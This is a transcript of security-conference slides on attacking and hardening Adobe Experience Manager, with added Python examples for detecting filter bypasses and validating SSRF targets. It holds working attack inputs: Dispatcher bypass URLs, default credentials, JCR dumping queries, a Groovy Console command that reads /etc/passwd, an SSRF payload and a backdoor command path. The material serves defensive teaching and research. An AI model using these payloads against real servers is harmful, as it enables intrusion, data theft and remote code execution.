
Securing AEM webapps by hacking them

Mikhail Egorov
September 03, 2019

Transcript

  1. APACHE SLING & FRIENDS TECH MEETUP
    2 - 4 SEPTEMBER 2019
    Securing AEM webapps by hacking them
    Mikhail Egorov @0ang3el, Security researcher & Bug hunter.

  2. whoami
    • Security researcher & full-time bug hunter
    • https://bugcrowd.com/0ang3el
    • https://hackerone.com/0ang3el
    • Conference speaker
    • https://www.slideshare.net/0ang3el
    • https://speakerdeck.com/0ang3el

  3. AEM & Bug Bounties

  4. My research on AEM security
    PHDays 2015
    Hacktivity 2018
    LevelUp 2019
    https://www.slideshare.net/0ang3el

  5. Fellow hackers
    @darkarnium, 2016
    @fransrosen, 2018
    @JonathanBoumanium, 2018
    https://medium.com/@jonathanbouman/reflected-xss-at-philips-com-e48bf8f9cd3c
    https://speakerdeck.com/fransrosen/a-story-of-the-passive-aggressive-sysadmin-of-aem
    http://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html

  6. Common AEM deployment
    Diagram: clients interact with the Publish server via the AEM Dispatcher (443/tcp); the Author and Publish instances are labelled with their default ports, 4502/tcp and 4503/tcp.
    Main blocks:
    • Author AEM instance
    • Publish AEM instance
    • AEM dispatcher (~WAF)

  7. Sources of vulnerabilities
    • AEM misconfiguration
    • AEM code (CVEs)
    • 3rd-party plugins
    • Your code

  8. Vulnerabilities due to misconfiguration

  9. AEM dispatcher bypass – CVE-2016-0957
    • Blocked by the Dispatcher
      /bin/querybuilder.json
    • However, passed through to the publish instance
      /bin/querybuilder.json/a.css
      /bin/querybuilder.json/a.icoS
      /bin/querybuilder.json?a.html
      /bin/querybuilder.json;%0aa.css

  10. AEM dispatcher bypass – Sling “features”
    • When a Sling Servlet is registered with sling.servlet.paths, the other properties are ignored (e.g. sling.servlet.extensions)
    • Bypassing the extension check
      /bin/querybuilder.json.css
      /bin/querybuilder.feed.ico

  11. AEM dispatcher bypass – Sling “features”
    • When a Sling Servlet is registered with sling.servlet.resourceTypes
    • Bypassing the path check
      Create a node with the proper sling:resourceType under /content/usergenerated/etc/commerce/smartlists

  12. AEM dispatcher security tips
    • Don’t use rules like
      /0041 { /type "allow" /url "*.css" } # This is bad
    • Better use
      /0041 { /type "allow" /extension 'css' }

  13. AEM dispatcher security tips
    • Explicit deny rules for dangerous endpoints
      /0090 { /type "deny" /path "/libs/*" }
      /0091 { /type "deny" /path "/bin/querybuilder*" }
    • Place the explicit deny rules at the end of the policy
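The bypasses on slides 9 to 11 and the tips on slides 12 and 13 come down to one gap: a /url glob only sees the raw request string, while Sling picks the servlet from the resource path it resolves after stripping the query string, ';' path parameters, selectors, extension and suffix. As an added example that is not from the deck, a Python check that resolves URLs from access-log lines the way Sling does and flags requests that a '*.css'-style /url allow rule would have passed to a sensitive servlet; SENSITIVE_PATHS, URL_ALLOW_GLOBS and the log lines are constructed.

```python
import re
from fnmatch import fnmatchcase
from urllib.parse import unquote, urlsplit

# Constructed list of servlet paths the Dispatcher is supposed to block.
SENSITIVE_PATHS = ("/bin/querybuilder", "/bin/groovyconsole", "/libs/")
# Allow rules written in the discouraged '/url "*.css"' style.
URL_ALLOW_GLOBS = ("*.css", "*.ico", "*.html")

def sling_resource_path(url: str) -> str:
    """Resource path Sling resolves for a URL (simplified): query string
    and ';' path parameters are ignored, the first '.' in a segment starts
    selectors/extension, and later segments are the suffix."""
    path = unquote(urlsplit(url).path)       # drops '?a.html', decodes '%0a'
    resolved = []
    for segment in path.split("/"):
        segment = segment.split(";", 1)[0]   # strip ';...' path parameters
        if "." in segment:
            resolved.append(segment.split(".", 1)[0])
            break                            # everything after is suffix
        resolved.append(segment)
    return "/".join(resolved)

def dispatcher_url_allows(url: str) -> bool:
    """Glob match on the raw URL, which is all a /url rule looks at."""
    return any(fnmatchcase(url, glob) for glob in URL_ALLOW_GLOBS)

def find_filter_bypasses(log_lines):
    """(raw_url, resolved_path) for requests that a /url allow rule lets
    through although Sling resolves them to a sensitive servlet path."""
    hits = []
    for line in log_lines:
        match = re.search(r'"(?:GET|POST) (\S+) HTTP/', line)
        if match:
            url = match.group(1)
            resolved = sling_resource_path(url)
            if resolved.startswith(SENSITIVE_PATHS) and dispatcher_url_allows(url):
                hits.append((url, resolved))
    return hits

# Constructed access-log lines, not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [03/Sep/2019:10:00:01 +0000] "GET /content/site/en.css HTTP/1.1" 200 812',
    '203.0.113.5 - - [03/Sep/2019:10:00:02 +0000] "GET /bin/querybuilder.json HTTP/1.1" 404 0',
    '203.0.113.5 - - [03/Sep/2019:10:00:03 +0000] "GET /bin/querybuilder.json/a.css HTTP/1.1" 200 9120',
    '203.0.113.5 - - [03/Sep/2019:10:00:04 +0000] "GET /bin/querybuilder.json;%0aa.css HTTP/1.1" 200 9120',
    '203.0.113.5 - - [03/Sep/2019:10:00:05 +0000] "GET /bin/querybuilder.json?a.html HTTP/1.1" 200 9120',
]
```

find_filter_bypasses(SAMPLE_LOG) flags the three querybuilder variants and leaves both the plain blocked request and the real stylesheet alone, which is exactly the traffic a /extension or /path based rule set would have stopped.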

  14. Default credentials
    • admin/admin
    • author/author
    • Geometrixx users
      grios:password
      [email protected]:jdoe
      …

  15. Default credentials
    (screenshot) == base64(admin:admin)

  16. Weak passwords / Credentials bruteforcing
    • Properties jcr:createdBy, cq:lastModifiedBy, jcr:lastModifiedBy contain usernames
    • Many ways to bruteforce
      LoginStatusServlet
      GetLoggedInUser servlet
      CurrentUserServlet
      …

  17. Weak permissions for JCR
    • Many ways to access JCR
      DefaultGetServlet
      QueryBuilderJsonServlet
      QueryBuilderFeedServlet
      GQLSearchServlet
      CRXDE Lite
      …

  18. Weak permissions for JCR
    • Anonymous user has jcr:write permission for /content/usergenerated/etc/commerce/smartlists

  19. (request screenshot)
    /apps//config.author.tidy.1..json/a.ico

  20. Weak permissions for JCR
    type=nt:file&nodename=*.zip

  21. Weak permissions for JCR
    path=/home&p.hits=full&p.limit=-1

  22. Vulnerabilities due to 3rd-party components

  23. Groovy Console
    • Exposes a servlet at /bin/groovyconsole/post.servlet without authentication by default
      https://github.com/icfnext/aem-groovy-console

  24. (request screenshot)
    script=def+proc+%3d+"cat+/etc/passwd".execute()%0d%0aprintln+proc.text

  25. ACS AEM Tools
    • Exposes Fiddle, with the ability to execute JSP scripts, at /etc/acs-tools/aem-fiddle/_jcr_content.run.html
    • May not require authentication

  27. AEM vulnerabilities

  28. CVE-2018-12809 (SSRF*)
    • ReportingServicesProxyServlet (cq-content-insight bundle)
    @SlingServlet(
        generateComponent = true,
        metatype = true,
        resourceTypes = {"cq/contentinsight/proxy"},
        extensions = {"json"},
        selectors = {"reportingservices"},
        methods = {"GET"},
        label = "Reporting Services API proxy servlet",
        description = "Proxy servlet for Reporting Services API"
    )
    public class ReportingServicesProxyServlet extends SlingSafeMethodsServlet {
        private static final String DEFAULT_API_OMNITURE_URL = ".*/api[0-9]*.omniture.com/.*";
    }
    * SSRF - Server Side Request Forgery

  29. CVE-2018-12809 (SSRF*)
    • Paths to invoke the servlet
      /libs/cq/contentinsight/content/proxy.reportingservices.json
      /libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet
    • Vulnerable parameter: url
      url=http://anyurl%23/api1.omniture.com/a
    * SSRF - Server Side Request Forgery
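Why the url payload on this slide gets past the DEFAULT_API_OMNITURE_URL constant shown on the previous one, as an added example that is not from the deck: the check is assumed to match the whole decoded url parameter against that regex with Java String.matches() semantics (the slide shows only the constant, not the call), so the host part is effectively unconstrained, while the hardened variant parses the URL and allowlists the host it will actually connect to. The hardened check, LEGIT_URL and PATH_BYPASS are constructed.

```python
import re
from urllib.parse import unquote, urlsplit

# Constant from the ReportingServicesProxyServlet slide: '.*' on both sides,
# unescaped dots, and nothing that anchors the match to the host part.
DEFAULT_API_OMNITURE_URL = ".*/api[0-9]*.omniture.com/.*"

# Constructed hardened allowlist: anchored, dots escaped, applied to the parsed host only.
ALLOWED_HOST = re.compile(r"api[0-9]*\.omniture\.com")

def target_host(url_param: str) -> str:
    """Host an HTTP client would actually connect to for this url parameter."""
    return urlsplit(unquote(url_param)).hostname or ""

def allowed_vulnerable(url_param: str) -> bool:
    """Assumed original check: the whole decoded url parameter must match the
    regex (Java String.matches(), i.e. Python re.fullmatch)."""
    return re.fullmatch(DEFAULT_API_OMNITURE_URL, unquote(url_param)) is not None

def allowed_hardened(url_param: str) -> bool:
    """Validate scheme and host after parsing, not the URL string as a whole."""
    parts = urlsplit(unquote(url_param))
    if parts.scheme not in ("http", "https"):
        return False
    return ALLOWED_HOST.fullmatch(parts.hostname or "") is not None

# The slide's payload: '%23' decodes to '#', so '/api1.omniture.com/a' is only
# the fragment and the proxied request goes to host 'anyurl'.
SLIDE_PAYLOAD = "http://anyurl%23/api1.omniture.com/a"

# Constructed inputs: a legitimate target, and a second URL that satisfies the
# regex because the expected string appears in the path rather than the host.
LEGIT_URL = "https://api2.omniture.com/admin/1.4/rest/"
PATH_BYPASS = "http://attacker.example/api1.omniture.com/"

def compare(url_param: str) -> dict:
    """Side-by-side verdict of both checks plus the real destination host."""
    return {
        "host": target_host(url_param),
        "vulnerable_check": allowed_vulnerable(url_param),
        "hardened_check": allowed_hardened(url_param),
    }
```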

  30. ExternalJobPostServlet deser / CVE?
    • Affects AEM 5.5 / AEM 5.6
    @Service
    @Properties(value = {
        @Property(name = "sling.servlet.extensions", value = "json"),
        @Property(name = "sling.servlet.paths", value = "/libs/dam/cloud/proxy"),
        @Property(name = "sling.servlet.methods", value = { "POST", "GET", "HEAD" })
    })
    public class ExternalJobPostServlet extends SlingAllMethodsServlet {
        ...
    }

  31. ExternalJobPostServlet deser / CVE?
    • Parameter file accepts a Java serialized stream and passes it to ObjectInputStream.readObject()
    • Hard to exploit in an OSGi environment

  32. Automation

  33. AEM RCE bundle
    • Allows getting RCE* when one has access to the Felix Console
      https://github.com/0ang3el/aem-rce-bundle.git
    * RCE – Remote Code Execution

  34. AEM RCE bundle
    • Path - /bin/backdoor.html?cmd=ifconfig

  35. AEM Hacker
    • Scripts to check the security of an AEM application
    • aem_hacker.py, aem_discoverer.py, aem_enum.py, aem_ssrf2rce.py, aem_server.py, response.bin, aem-rce-sling-script.sh
    • https://github.com/0ang3el/aem-hacker.git

  36. Takeaways
    • Vulnerabilities can occur at different levels
    • Install security updates
    • Defense in depth
    • Check the security of the AEM application
    • Pentest / Bug bounty

  37. Thank you
    @0ang3el
